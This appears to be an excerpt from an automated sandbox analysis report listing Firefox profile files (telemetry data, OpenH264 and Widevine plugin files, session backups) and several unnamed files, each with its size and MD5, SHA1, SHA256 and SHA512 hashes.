C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD51fdfd61dcd929b2933cb6b3deae95ee2
SHA10c88509ac58df91f31ae8df47e3b9c1de5fb331e
SHA256557ffa0536e4f73a85706103c9d8de809ec9f8c7e4c78ade1705805869f49295
SHA512c3424da75f622c256ecad721472b573cf808639f26957659e7a0b0d366592247c4aa0f2501690ea1154446661f4a076812ef08d1c9e82ae113996b81894d3993
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\0ede9a34-7d6c-440a-8beb-4c0df9508114
Filesize3KB
MD598d27108a24995c0dfd6e9c8ec2de915
SHA13e26f5ebac29bc68cf8a31b2f2009b3b30a23448
SHA256c47f371a2824479aa9aa1d9eee062541b51e29646d7c5e967bd4cd29dc36e01e
SHA512e3c0133eea04409372be9fc5e9a8448c66a3231ac88f5823f4554cf58f47996c6b54ee4ad16a391a8eb84ecd1784cd2dc964f59d3b4cc17c5508b63a3000c0cc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\bb966868-59a1-417f-8409-8b3399bf4c99
Filesize745B
MD54ed941ab06d291df4d313b250f917d6b
SHA1d364ecc1d33005ea1b173eaf2f048cea28ec7c56
SHA2565d0d252a5a47689fe3c0c9686c9b5a17230d25ff94cc3ae358e04de888a3f357
SHA512717e4c7c7eb989a3ccf59e82d0c1afd48d768c2f2046d8bfe7b7b9bd951eea1654e68e45c41bd4a6589955dd9e21057264ee35967da1c224d687cf049a74f7b4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD5d8501824a6f63660b1f7790557bf4d96
SHA1ba0e4c6f25b6ab88f68f71c0887d20cea05b905e
SHA2567199e6fdae77323563ed7533a5abf4f5116702d6d92ddd9563bb9883d3f94182
SHA51232f92301e40f553de3836538f768af371ece1ac082f2ac049e504080a2803a541abd89bd371d28e1019254c2df0e2ac43125d4810a5cd1fb256dae34d7ee6496
-
Filesize
6KB
MD5c128567e0b44c66c8d810caa1bf6180f
SHA1f474d9ae9dcbdc6669521dea56813fe1905fbb7f
SHA256bdd48873e72f6cb44d73673f5d5c17615fe836d6558b10abf627221ca629fbac
SHA5127cfd105b30bcfea7efef914d97fddd12843b596286934e193ea5a0e1607bbf103660fec795d8fb4f57a67a5c998185b56be8458c31337c3d3e8083f54ef5fe9a
-
Filesize
6KB
MD5c722fb6c809f1334bcceae989f97ee62
SHA1512546240332714e0abd9cde6fb69a1ba64f874a
SHA25660e35b698aac5346da4d265277de475a76d1e562c26146a15c15f4708eaa8ab5
SHA5124895c3e966694454ce5074811c18ca2a38556a5e31c2d52c332422c1c4b548e549007f9a8dc9dae40a31b255b810ffc7919851971914f92c6e05fdc6c75b7fef
-
Filesize
6KB
MD5f088406f1e409493a1506e05c2074135
SHA122f3ffd4cb6e9b47f900e343da206d5c0ef3a927
SHA25675a89eabba2fe66eb8b684eecd52f014858aedc39c51b5d60c0d4aefa90d1722
SHA5123d43c9f2c9cb96f401d6b945a5952cbf707f1a5a1aa93af9dee7d82a797d47a410595502fc1bcd65805231c23eb4345bb77f971115ae05fbdeae1d54a3437b24
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD509c8b9494cf0fe14e0b8a32efee949a2
SHA1e7e0f3d95923c7ac68334e8bb730688bffe2cb79
SHA256f0322ed3382bbed0bf2a46858d3e7d9502736a3764d762893cee9c285878e1d0
SHA5128bd69316b164033b7e0bb26c66d199dee3df254d9086f2f1ac209055a6917729647c2b8ec9480c8e7f49cf295a88552385da37f2028ecfd63cb90ef140e75982
-
Filesize
5.6MB
MD5958c9e0114b96e568a2cc7f44fed29d8
SHA1bfe95d84a6243da42e0e0e89a7c6a5e87ce96487
SHA256935aac20de79946cbcd537f5c15f166449bb218bd41f01f8130ff1b795421d8a
SHA5128ed92a2f09cca8364727a9f057f7fcc42986d696b6c4e77b2695c0694b05046c92679cb13ba8926aeabf59afbbdd28b0075554cab487d5cf883bde6815c6d592
-
Filesize
860KB
MD583495e5db2654bcec3948ee486424599
SHA18a86af21864f565567cc4cc1f021f08b2e9febaa
SHA256e770be8fba337cc01e24c7f059368526a804d2af64136a39bb84adeebcf9cfbc
SHA512b4dbdfff0501fb3ba912556a25a64da38d3872bc31c94cc2395d6567b786cbbe104fd6178f019f8efba08dc5abcd964616a99d886b74aa80014b1c09ba7e9c41
-
Filesize
437KB
MD5e9f00dd8746712610706cbeffd8df0bd
SHA15004d98c89a40ebf35f51407553e38e5ca16fb98
SHA2564cb882621a3d1c6283570447f842801b396db1b3dcd2e01c2f7002efd66a0a97
SHA5124d1ce1fc92cea60859b27ca95ca1d1a7c2bec4e2356f87659a69bab9c1befa7a94a2c64669cef1c9dadf9d38ab77e836fe69acdda0f95fa1b32cba9e8c6bb554
-
Filesize
446KB
MD54d20b83562eec3660e45027ad56fb444
SHA1ff6134c34500a8f8e5881e6a34263e5796f83667
SHA256c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1
SHA512718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4
-
Filesize
1.8MB
MD5895d364d98674fc39c6c2ca1607c189c
SHA1089147d7501025cfc4f8b84305dfd211c8708be4
SHA25643374f0238ae8b778ff340a81a654269894b69815eae179af6634bcf08c96301
SHA51256a3e90dc994f061431c5173021cc234cacb37e3cdb1df5f073c92d90fff7495385277da29abf839b77b4cbcf36ca318a2a83f6fbfd484670527e97f45be4d9d
-
Filesize
650KB
MD5682f74b9221d299109a3d668d6c49613
SHA193b98dbe3fbe1830f9de24d1c36ebc7d7da3738b
SHA256f4ffce0b075ea7f473e6c8f04688b3abc0df5bf56e3ff4497fece42ab714d3b5
SHA512d2995305a2452363932491f25dc0a51a1d2daf2f62d1feb3290958604981dd2a6f77c88d9ea7215d188f1e6898b9c6ed1686c1a2437b84be38a9282c325c8d8f